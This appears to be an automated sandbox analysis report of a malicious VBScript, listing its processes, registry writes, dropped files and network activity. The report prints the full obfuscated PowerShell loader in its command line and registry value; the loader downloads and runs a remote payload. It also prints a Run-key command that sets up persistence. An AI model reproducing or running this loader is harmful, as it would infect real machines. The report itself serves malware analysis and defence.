| File name: | duck.vbs |
| Full analysis: | https://app.any.run/tasks/c691338c-4e8b-4d1f-92e9-bc7ede965d0e |
| Verdict: | Malicious activity |
| Analysis date: | July 14, 2025, 16:39:26 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with CRLF line terminators |
| MD5: | 07340E6AB3BD33BA1EBDF965C5D5ADED |
| SHA1: | C0C8D6424495FA5D225404C15E75054FDB204659 |
| SHA256: | 369A39278B92BF34357E7D9D6869E3CDA846B2FE11D6710DFBA99A4530E37E90 |
| SSDEEP: | 1536:DiNzmgYBUTzc03+HaEVA18TAPuLeJ1NCRPpWVlYkjtH9hS2KSk:DiVmhw53qaoVsPu6JIPpW/YkxH9gmk |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1044 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Coawarenessnfundibulum; function Lsreforsikringerne168($overslept){$Coawareness=5;do{$Roquer+=$overslept[$Coawareness];Format-List;$Coawareness+=6} until(!$overslept[$Coawareness])$Roquer}function Laserpladens($Ajlebeholders){ .($Stamaktionrs) ($Ajlebeholders)}$rajahen=Lsreforsikringerne168 'OmslaNUnstre PylrtT ans.DokumW';$rajahen+=Lsreforsikringerne168 'UnexpeSplutbTutbaC Sognl ScarIIseumeBogarNBariuT';$Openers86=Lsreforsikringerne168 'TathaMKaro,oKnytnzKerryiB bialcemenlBrandaKalv,/';$Dabb=Lsreforsikringerne168 'AntipTN.rdylAdre,sNatu 1Brugs2';$Communicants186='Tilst[UnfetNFrugtERigshTequia. EskaSWawlseFiberrBrudsv,rontiInaboCUletiEBehveP Raado KorriPapernEf erTPhotomKone.APre oNPaperADekaggout eeUn,trr be k]Unrev: Runa:LignisGyptoeH podCSejtfUArresRLathhiKlariTBrylly malsP Re,lrCantoO dfrot HomoOPropoCInterODdm nl Brun=D.mon$Lysb dKnaphA.ircubGjordb';$Openers86+=Lsreforsikringerne168 'Jaz o5Gari .Imple0 Cymo vand( StreWCont.iBanesnInaptdNo,too Chorw Sal sPick Son,fNEpenlTPale, Toile1 Comp0 Pap .Seppo0 vinf; Klim BriksWIndveiDetoxnBr,ec6 Solo4Va dt;Tands drejexInso 6Klken4 Conj;Spa,t OverrU.derv Synk:Dkken1Dygt.3Timef4 Blok. levn0Herre)Snatc .ynkeGSyst.eHvedec MailkSelv o Med./Ramti2N gro0Unio 1Law o0Found0 Gart1 jals0 Rolf1Annat FlyveF optii ppusrK rneeFakerfPristoSkyg,xGasfy/Un la1Teis,3B.lde4Sewer.Handk0';$Vejrudsigterne=Lsreforsikringerne168 'Uret ULuganSV ngueRepetRDamp - onkuaAndreg ttteeNetv,nTympat';$Pleinairist151=Lsreforsikringerne168 'hampehLeptetSneglt PlirpUnephsS.adf:Bemrk/Trosr/EjendifrdsenDuractVippeuOversnu.skruSejrsi Afhes,rkhehCheene onfir Summe Surn. Heitc DekaoCo scmS.ral/TrustwFolacpRefu.-Afgu cU,tilo enatn SkrgtPhenoeAns,en.urattInt r/ KarlFParablG,aznaSvirrmDebeti aninCombigPolitoBerga2 itte.A.dalpTaarnnSynchg,erca> Af rh Fes tTvingtAvisspDruess rimm:Refl /Kladd/SedaniLiffrnMot.vtEnvoyuLittenPhoenuWagg i Tem sPjecehMatt,eIdeykrSess eFluoasF unk.impalcUd.nroKannem Idea/retsvwUno epDocto-Oversc .yleobfkrinSmro tAntone jesnCo potKnitw/ CoffFBandalBagsiaS,ylamInteri hankn mlsgSkadeoA.ach2paafu.ArouspJumblnPetalg';$sonaten=Lsreforsikringerne168 ' ighu>';$Stamaktionrs=Lsreforsikringerne168 'I teriGorgoe nderx';$Cykelanhnger='Appelretterne';$Enpia='\Mediodorsal.Doc';Laserpladens (Lsreforsikringerne168 'Extra$ HaglGFo eblSolsooGa teBFejlmaScantLEumit: MajoE C.nfxu spueBarbeMSamkvPKavall MissIPreciF.npaci Hec,a BlocBLambelAlcoheAglai=Cykel$DatasePref N BgerVAsylu:KphjeaInterpT,afiPDemurdMerria AmortMuyanA.leer+Aftal$SquaneS,arnn Airlp Ov,rIBruneA');Laserpladens (Lsreforsikringerne168 'Red s$Nigg,GLkageLIldsjOG,llaBm.ddaaMu guLAbste:krakuL OrakvTaleusGlycekOpgreOGra evBrackERooklnGen.rSSkept= Fede$Kolonp KilolTrickEHilduIRipienRena aMedhoIJudopR stilIRe ulsLaedeTAfvis1Funeb5Echoi1S eci.InnocsnonapPThe mLGothaIBrokftAppro(Selvh$ProvosMilieOS minNUdannaOverwT GtteEMultiN Hexa)');Laserpladens (Lsreforsikringerne168 $Communicants186);$Pleinairist151=$Lvskovens[0];$Meleringers=(Lsreforsikringerne168 ' Dott$Non rGHymenl.olkeoMonisbTilblA,djudl dfol:Tva gNUddatESidebd FjerL DeklAH perEGenerGRifbjg Sig eHypocSUnma,= ChudnNasseETableWTidsa-CogitOTechnbUtrolJRe isePersocPresoT thei StaaS AlleYdiswoSbega,t Ne bE Placm phen.Satsn$ReprorDecidA otizjHavemAUnretHH ardeEksamn');Laserpladens ($Meleringers);Laserpladens (Lsreforsikringerne168 ' For $KonseNMetroeMorg.dSeicelAstraaHastieUnde gCliqugic.theUn vosInsek.ManglHunblee Ircsa ltridReolsescornrReflesSemir[Maale$ E ecVSusurePredij .irkrBankbuKravldTranss EtymiPrecugLoesstD.oboeSosqurAridin DybfeDisad] Flgb=Aev,m$ kifOT potp HomeeSpe knRumsteCompurFornusCne,a8 lori6');$Gibsons=Lsreforsikringerne168 'Slare$ SoraN.rimaeZygosdRemanlMaletaLektueSandhgKartegFunkte PatesSkalo.S,andD alatoPrimiwOlinin prnglHelbro Res,aTabued O feF odriInkvilAcceseRearw(Sk pe$ Pix PInsuflF rlyePachuiVagtmnPrintaBetoni AfdarAu uniTrykps xylutDybfr1Mount5 Unke1Conse,Arkln$JereeaErantmS,ppoyTrykll pen oMonitsOpgejiCardisKortv)';$amylosis=$Exemplifiable;Laserpladens (Lsreforsikringerne168 'Bisag$ StergMorsoLRatifONa,neB,tubbaCler LRunm :CamorPAgtedRCo,ineUnhaissekuneTe,nenSeernnDiffeiBoll N NarkgProtoEUdlign Shovshatc,=st rt(TempotFl teeBipinSAu actAf lr-riderP KultaFolkeTSemi.hS iff oili$No.reaEstimMKilliyBi onLDeposoBlondsMameri GrinsSwi,g)');while (!$Presenningens) {Laserpladens (Lsreforsikringerne168 'Une,p$ W,neg jupalRul.mo RecibSam paKillilGramp:DemytR Ba au GennsApothtEkspavTidsro S adgcalvinUnscasIndva=samme$ekserB arraaPa tesTrehetCaragaCau,irNitrodUddaniPera,s lumpeVidnerBrdskeBecutnPibrodCaroueThanks') ;Laserpladens $Gibsons;Laserpladens (Lsreforsikringerne168 'PandisPumpeTbrugea BarrrMo ocTMe oc-TresasantralKonvoeN.ndeEStoerPTomme Sta,d4');Laserpladens (Lsreforsikringerne168 '.fter$FlattGS,agsLInfatoT skeB UdbaA,olmaLPerna:SemihPFj,ldrLunchE RodeSPuerpePolluNFlovmnVandaIFinkunLufthGGrundeVestenRecocs,ishs=Bibli(Corn,T Me sETranssRajahTTelot-Denn p Non A haanTMelicH Sko Funkt$B traaVissemE sekyVidtfL DilloHoverss matI onfSIrade)') ;Laserpladens (Lsreforsikringerne168 'In er$ Sko,GDroscLScappOGenevBSvineAAdganlStave:GenuifM rroISlagtGBet,oEBegynNMicrok pcybasau oKUndettNo,reu giftSProfiSCynare eiern CentSblegn=Mutua$Mah.oghjredL In.aOBeskebFormaaprinslHunde:SejugFCaffay CounRTj ttsgennetAcetoERounds Mil u .ingiVandmtDingmEjenb + ermi+Trv.t%Farma$Kamm LO erpVEf hcs oksKKfhsloTugt vMetroeHv elN reaSspild.Sargec To.aOFoto uR melnTynd T') ;$Pleinairist151=$Lvskovens[$Figenkaktussens]}$Skners105=294897;$Pelopaeus=32011;Laserpladens (Lsreforsikringerne168 'Dist $LaantGSoundLu iliOWarriBSladrA,sblalAktiv:PostmDReamoI Eff sInferhOndeseillicvSvoemE Reexls nhem hirmEO erlNBlessTrevea Ganga=Bass nterGB okaEPresht Kara-PrytacB blooSuperNSlutntAfbrye AffeN FrugTTo,qu Conte$TurriAForviMFerriyBrug.lSlappOvomits ContIHamzas');Laserpladens (Lsreforsikringerne168 ' lokl$LingugShorelNaniso,ikadbBehavaStrm,lSmerg:JouleV HemiiSpar.cBivuaeMa.icb,uperoForvrr Reflg frunmRemageciselsSeigntSt.ngrStudeeAlde Infu =R,cif skral[ ForkSLastey Jok,sF,rmltRepaceempyemJager.ReautCEstivoKonf.nUnvolvMa,roe Pra rPresetOpbak],ideh:Snaps:TeateF HosprJanteo.erejmNost BZafs aSlutas Gr de Libi6Overr4FrockS FreetAfgr,rBonusiTimwhnUndivg yrep( Orga$PynteDPlankiTotalsFisk hOverfeUnspivbrleneFeofflEmbermRectoe eternKonsutProgr)');Laserpladens (Lsreforsikringerne168 'Sti,l$annliG OverLKlunkO lderbAdhreA JuleLKompa: B,dgC .dskHTrensi EyebCUnchakSarcosIsoda Alter=C ick brid[KlynksKithly BracsVejrmTAr waEE dosMBybe . vasotArbejEFel sXDorotT lles.pleioeIndesnHardwc halsO GeliDRrdruI,annaNFor kG.fter]Befug:S rvi:Ungena fstvsTi,nrcFjerdiN,urii C nt.SnowmGA,greeSatirtUnbursF ltbtJerikrC utciD,nosn StttG fe t(Orega$Appl v kresiArchecPo,itEFor,jbTestioLimnoRImmobgFund m,allieSelvtSMe.nitDobbeRFolk.eNonse)');Laserpladens (Lsreforsikringerne168 'Ti,pl$SavouGTilfilSelvfoCitysb Amada VildLTeori:GasteRH ldeASafindMastoiAfdk O Me,iDKrop.ov lern TeleTjonisIMisruAFerfe2 vund2A aca7 Pi e=B.ckr$Opd gCVindahSirtsI,ulsecNeochKepiphsOvert.F,rprsF,lmiuAvoirbVelloS,iolotElimirKonveibankbnC eteGUdtrt(Op um$ Sto.SSkuldK OverNEksp e edorpidgiSK,wif1Osmat0Udkom5Blges,Whirr$BegruPLinolELkkesLAppenODema pBogiea larE L gauDupl Shongn)');Laserpladens $Radiodontia227;" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wscript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1096 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2200 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2696 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3048 | REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Baptistens" /t REG_EXPAND_SZ /d "%Kindles% -windowstyle 1 $Revitalizations=(gi 'HKCU:\Software\Unctious\').GetValue('Kisteklders');%Kindles% ($Revitalizations)" | C:\Windows\SysWOW64\reg.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3100 | "C:\WINDOWS\System32\WScript.exe" C:\Users\admin\AppData\Local\Temp\duck.vbs | C:\Windows\System32\wscript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 4156 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4808 | "C:\WINDOWS\SysWOW64\msiexec.exe" | C:\Windows\SysWOW64\msiexec.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Version: 5.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6524 | "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Baptistens" /t REG_EXPAND_SZ /d "%Kindles% -windowstyle 1 $Revitalizations=(gi 'HKCU:\Software\Unctious\').GetValue('Kisteklders');%Kindles% ($Revitalizations)" | C:\Windows\SysWOW64\cmd.exe | — | msiexec.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6724 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (4808) msiexec.exe | Key: | HKEY_CURRENT_USER\Environment |
| Operation: | write | Name: | Kindles |
Value: c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | |||
| (PID) Process: | (4808) msiexec.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Unctious |
| Operation: | write | Name: | Kisteklders |
Value: echo $Coawarenessnfundibulum; function Lsreforsikringerne168($overslept){$Coawareness=5;do{$Roquer+=$overslept[$Coawareness];Format-List;$Coawareness+=6} until(!$overslept[$Coawareness])$Roquer}function Laserpladens($Ajlebeholders){ .($Stamaktionrs) ($Ajlebeholders)}$rajahen=Lsreforsikringerne168 'OmslaNUnstre PylrtT ans.DokumW';$rajahen+=Lsreforsikringerne168 'UnexpeSplutbTutbaC Sognl ScarIIseumeBogarNBariuT';$Openers86=Lsreforsikringerne168 'TathaMKaro,oKnytnzKerryiB bialcemenlBrandaKalv,/';$Dabb=Lsreforsikringerne168 'AntipTN.rdylAdre,sNatu 1Brugs2';$Communicants186='Tilst[UnfetNFrugtERigshTequia. EskaSWawlseFiberrBrudsv,rontiInaboCUletiEBehveP Raado KorriPapernEf erTPhotomKone.APre oNPaperADekaggout eeUn,trr be k]Unrev: Runa:LignisGyptoeH podCSejtfUArresRLathhiKlariTBrylly malsP Re,lrCantoO dfrot HomoOPropoCInterODdm nl Brun=D.mon$Lysb dKnaphA.ircubGjordb';$Openers86+=Lsreforsikringerne168 'Jaz o5Gari .Imple0 Cymo vand( StreWCont.iBanesnInaptdNo,too Chorw Sal sPick Son,fNEpenlTPale, Toile1 Comp0 Pap .Seppo0 vinf; Klim BriksWIndveiDetoxnBr,ec6 Solo4Va dt;Tands drejexInso 6Klken4 Conj;Spa,t OverrU.derv Synk:Dkken1Dygt.3Timef4 Blok. levn0Herre)Snatc .ynkeGSyst.eHvedec MailkSelv o Med./Ramti2N gro0Unio 1Law o0Found0 Gart1 jals0 Rolf1Annat FlyveF optii ppusrK rneeFakerfPristoSkyg,xGasfy/Un la1Teis,3B.lde4Sewer.Handk0';$Vejrudsigterne=Lsreforsikringerne168 'Uret ULuganSV ngueRepetRDamp - onkuaAndreg ttteeNetv,nTympat';$Pleinairist151=Lsreforsikringerne168 'hampehLeptetSneglt PlirpUnephsS.adf:Bemrk/Trosr/EjendifrdsenDuractVippeuOversnu.skruSejrsi Afhes,rkhehCheene onfir Summe Surn. Heitc DekaoCo scmS.ral/TrustwFolacpRefu.-Afgu cU,tilo enatn SkrgtPhenoeAns,en.urattInt r/ KarlFParablG,aznaSvirrmDebeti aninCombigPolitoBerga2 itte.A.dalpTaarnnSynchg,erca> Af rh Fes tTvingtAvisspDruess rimm:Refl /Kladd/SedaniLiffrnMot.vtEnvoyuLittenPhoenuWagg i Tem sPjecehMatt,eIdeykrSess eFluoasF unk.impalcUd.nroKannem Idea/retsvwUno epDocto-Oversc .yleobfkrinSmro tAntone jesnCo potKnitw/ CoffFBandalBagsiaS,ylamInteri hankn mlsgSkadeoA.ach2paafu.ArouspJumblnPetalg';$sonaten=Lsreforsikringerne168 ' ighu>';$Stamaktionrs=Lsreforsikringerne168 'I teriGorgoe nderx';$Cykelanhnger='Appelretterne';$Enpia='\Mediodorsal.Doc';Laserpladens (Lsreforsikringerne168 'Extra$ HaglGFo eblSolsooGa teBFejlmaScantLEumit: MajoE C.nfxu spueBarbeMSamkvPKavall MissIPreciF.npaci Hec,a BlocBLambelAlcoheAglai=Cykel$DatasePref N BgerVAsylu:KphjeaInterpT,afiPDemurdMerria AmortMuyanA.leer+Aftal$SquaneS,arnn Airlp Ov,rIBruneA');Laserpladens (Lsreforsikringerne168 'Red s$Nigg,GLkageLIldsjOG,llaBm.ddaaMu guLAbste:krakuL OrakvTaleusGlycekOpgreOGra evBrackERooklnGen.rSSkept= Fede$Kolonp KilolTrickEHilduIRipienRena aMedhoIJudopR stilIRe ulsLaedeTAfvis1Funeb5Echoi1S eci.InnocsnonapPThe mLGothaIBrokftAppro(Selvh$ProvosMilieOS minNUdannaOverwT GtteEMultiN Hexa)');Laserpladens (Lsreforsikringerne168 $Communicants186);$Pleinairist151=$Lvskovens[0];$Meleringers=(Lsreforsikringerne168 ' Dott$Non rGHymenl.olkeoMonisbTilblA,djudl dfol:Tva gNUddatESidebd FjerL DeklAH perEGenerGRifbjg Sig eHypocSUnma,= ChudnNasseETableWTidsa-CogitOTechnbUtrolJRe isePersocPresoT thei StaaS AlleYdiswoSbega,t Ne bE Placm phen.Satsn$ReprorDecidA otizjHavemAUnretHH ardeEksamn');Laserpladens ($Meleringers);Laserpladens (Lsreforsikringerne168 ' For $KonseNMetroeMorg.dSeicelAstraaHastieUnde gCliqugic.theUn vosInsek.ManglHunblee Ircsa ltridReolsescornrReflesSemir[Maale$ E ecVSusurePredij .irkrBankbuKravldTranss EtymiPrecugLoesstD.oboeSosqurAridin DybfeDisad] Flgb=Aev,m$ kifOT potp HomeeSpe knRumsteCompurFornusCne,a8 lori6');$Gibsons=Lsreforsikringerne168 'Slare$ SoraN.rimaeZygosdRemanlMaletaLektueSandhgKartegFunkte PatesSkalo.S,andD alatoPrimiwOlinin prnglHelbro Res,aTabued O feF odriInkvilAcceseRearw(Sk pe$ Pix PInsuflF rlyePachuiVagtmnPrintaBetoni AfdarAu uniTrykps xylutDybfr1Mount5 Unke1Conse,Arkln$JereeaErantmS,ppoyTrykll pen oMonitsOpgejiCardisKortv)';$amylosis=$Exemplifiable;Laserpladens (Lsreforsikringerne168 'Bisag$ StergMorsoLRatifONa,neB,tubbaCler LRunm :CamorPAgtedRCo,ineUnhaissekuneTe,nenSeernnDiffeiBoll N NarkgProtoEUdlign Shovshatc,=st rt(TempotFl teeBipinSAu actAf lr-riderP KultaFolkeTSemi.hS iff oili$No.reaEstimMKilliyBi onLDeposoBlondsMameri GrinsSwi,g)');while (!$Presenningens) {Laserpladens (Lsreforsikringerne168 'Une,p$ W,neg jupalRul.mo RecibSam paKillilGramp:DemytR Ba au GennsApothtEkspavTidsro S adgcalvinUnscasIndva=samme$ekserB arraaPa tesTrehetCaragaCau,irNitrodUddaniPera,s lumpeVidnerBrdskeBecutnPibrodCaroueThanks') ;Laserpladens $Gibsons;Laserpladens (Lsreforsikringerne168 'PandisPumpeTbrugea BarrrMo ocTMe oc-TresasantralKonvoeN.ndeEStoerPTomme Sta,d4');Laserpladens (Lsreforsikringerne168 '.fter$FlattGS,agsLInfatoT skeB UdbaA,olmaLPerna:SemihPFj,ldrLunchE RodeSPuerpePolluNFlovmnVandaIFinkunLufthGGrundeVestenRecocs,ishs=Bibli(Corn,T Me sETranssRajahTTelot-Denn p Non A haanTMelicH Sko Funkt$B traaVissemE sekyVidtfL DilloHoverss matI onfSIrade)') ;Laserpladens (Lsreforsikringerne168 'In er$ Sko,GDroscLScappOGenevBSvineAAdganlStave:GenuifM rroISlagtGBet,oEBegynNMicrok pcybasau oKUndettNo,reu giftSProfiSCynare eiern CentSblegn=Mutua$Mah.oghjredL In.aOBeskebFormaaprinslHunde:SejugFCaffay CounRTj ttsgennetAcetoERounds Mil u .ingiVandmtDingmEjenb + ermi+Trv.t%Farma$Kamm LO erpVEf hcs oksKKfhsloTugt vMetroeHv elN reaSspild.Sargec To.aOFoto uR melnTynd T') ;$Pleinairist151=$Lvskovens[$Figenkaktussens]}$Skners105=294897;$Pelopaeus=32011;Laserpladens (Lsreforsikringerne168 'Dist $LaantGSoundLu iliOWarriBSladrA,sblalAktiv:PostmDReamoI Eff sInferhOndeseillicvSvoemE Reexls nhem hirmEO erlNBlessTrevea Ganga=Bass nterGB okaEPresht Kara-PrytacB blooSuperNSlutntAfbrye AffeN FrugTTo,qu Conte$TurriAForviMFerriyBrug.lSlappOvomits ContIHamzas');Laserpladens (Lsreforsikringerne168 ' lokl$LingugShorelNaniso,ikadbBehavaStrm,lSmerg:JouleV HemiiSpar.cBivuaeMa.icb,uperoForvrr Reflg frunmRemageciselsSeigntSt.ngrStudeeAlde Infu =R,cif skral[ ForkSLastey Jok,sF,rmltRepaceempyemJager.ReautCEstivoKonf.nUnvolvMa,roe Pra rPresetOpbak],ideh:Snaps:TeateF HosprJanteo.erejmNost BZafs aSlutas Gr de Libi6Overr4FrockS FreetAfgr,rBonusiTimwhnUndivg yrep( Orga$PynteDPlankiTotalsFisk hOverfeUnspivbrleneFeofflEmbermRectoe eternKonsutProgr)');Laserpladens (Lsreforsikringerne168 'Sti,l$annliG OverLKlunkO lderbAdhreA JuleLKompa: B,dgC .dskHTrensi EyebCUnchakSarcosIsoda Alter=C ick brid[KlynksKithly BracsVejrmTAr waEE dosMBybe . vasotArbejEFel sXDorotT lles.pleioeIndesnHardwc halsO GeliDRrdruI,annaNFor kG.fter]Befug:S rvi:Ungena fstvsTi,nrcFjerdiN,urii C nt.SnowmGA,greeSatirtUnbursF ltbtJerikrC utciD,nosn StttG fe t(Orega$Appl v kresiArchecPo,itEFor,jbTestioLimnoRImmobgFund m,allieSelvtSMe.nitDobbeRFolk.eNonse)');Laserpladens (Lsreforsikringerne168 'Ti,pl$SavouGTilfilSelvfoCitysb Amada VildLTeori:GasteRH ldeASafindMastoiAfdk O Me,iDKrop.ov lern TeleTjonisIMisruAFerfe2 vund2A aca7 Pi e=B.ckr$Opd gCVindahSirtsI,ulsecNeochKepiphsOvert.F,rprsF,lmiuAvoirbVelloS,iolotElimirKonveibankbnC eteGUdtrt(Op um$ Sto.SSkuldK OverNEksp e edorpidgiSK,wif1Osmat0Udkom5Blges,Whirr$BegruPLinolELkkesLAppenODema pBogiea larE L gauDupl Shongn)');Laserpladens $Radiodontia227; | |||
| (PID) Process: | (3048) reg.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
| Operation: | write | Name: | Baptistens |
Value: %Kindles% -windowstyle 1 $Revitalizations=(gi 'HKCU:\Software\Unctious\').GetValue('Kisteklders');%Kindles% ($Revitalizations) | |||
| (PID) Process: | (4808) msiexec.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\yuedsy-LIYZP6 |
| Operation: | write | Name: | exepath |
Value: AD8F461701082D05AE5763E49299BA7435081CF5B80D29663206F4DC745E5220D7626D45DF9A0D0002FF4A507F2404BDEFDEC00BBB25F77452E6A575DDCD1B3D | |||
| (PID) Process: | (4808) msiexec.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\yuedsy-LIYZP6 |
| Operation: | write | Name: | licence |
Value: B0317C8A9682B5CD58EB6644CD15AFBF | |||
| (PID) Process: | (4808) msiexec.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\yuedsy-LIYZP6 |
| Operation: | write | Name: | time |
Value: | |||
| (PID) Process: | (4808) msiexec.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\yuedsy-LIYZP6 |
| Operation: | write | Name: | UID |
Value: 43535413 | |||
| (PID) Process: | (4808) msiexec.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (4808) msiexec.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (4808) msiexec.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 1044 | powershell.exe | C:\Users\admin\AppData\Roaming\Mediodorsal.Doc | text | |
MD5:41E18626E13CD216C4884CF0C9F1FC67 | SHA256:F93506DF8212346E18BD5110324523EF398242BBD0445018B5777B17E1B4F657 | |||
| 6980 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rnl0eylz.qzo.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 4808 | msiexec.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12 | der | |
MD5:CA8A9BDCA7AD59F5C8B7E1AA63160039 | SHA256:81B7FA53B692B4D26E2E8943F2DDA2F9563CFCB0E11F48679EB2BE4F8C375B90 | |||
| 1044 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5zmioezu.h0b.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 1044 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:08603A6CFAACE0A9E655392BCFE5B626 | SHA256:9D7146CB422AAF7DA8DB25114128E7F8A39E4C2CBC8C68F36B09B8C474A95E24 | |||
| 6980 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zsbssvlh.3pf.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6980 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:8E7D26D71A1CAF822C338431F0651251 | SHA256:495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084 | |||
| 4808 | msiexec.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\json[1].json | binary | |
MD5:0A70F73427816D85BBF563F246046563 | SHA256:D35A081BF7A2B3D664B8EE2B8998E07DB3F7C4BA62908E5451BC8A48DA48A55D | |||
| 4808 | msiexec.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8 | binary | |
MD5:BB9F3250B01D82FEE0D2B868AAFBB3D9 | SHA256:092C279F7FA21F6D3367B692597E38CF201967083BAB2F131CF94D0E81E07097 | |||
| 4808 | msiexec.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12 | binary | |
MD5:EBD79CFFD38CC8BC87FEF345EF49BB8F | SHA256:2110E66FA55A0A2402A46DF3BB08AC440DA190184446852524A5B5934AE19F63 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
1268 | svchost.exe | GET | 200 | 23.216.77.36:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
1268 | svchost.exe | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
6260 | SIHClient.exe | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
3944 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
6260 | SIHClient.exe | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
4808 | msiexec.exe | GET | 200 | 142.250.185.195:80 | http://c.pki.goog/r/gsr1.crl | unknown | — | — | whitelisted |
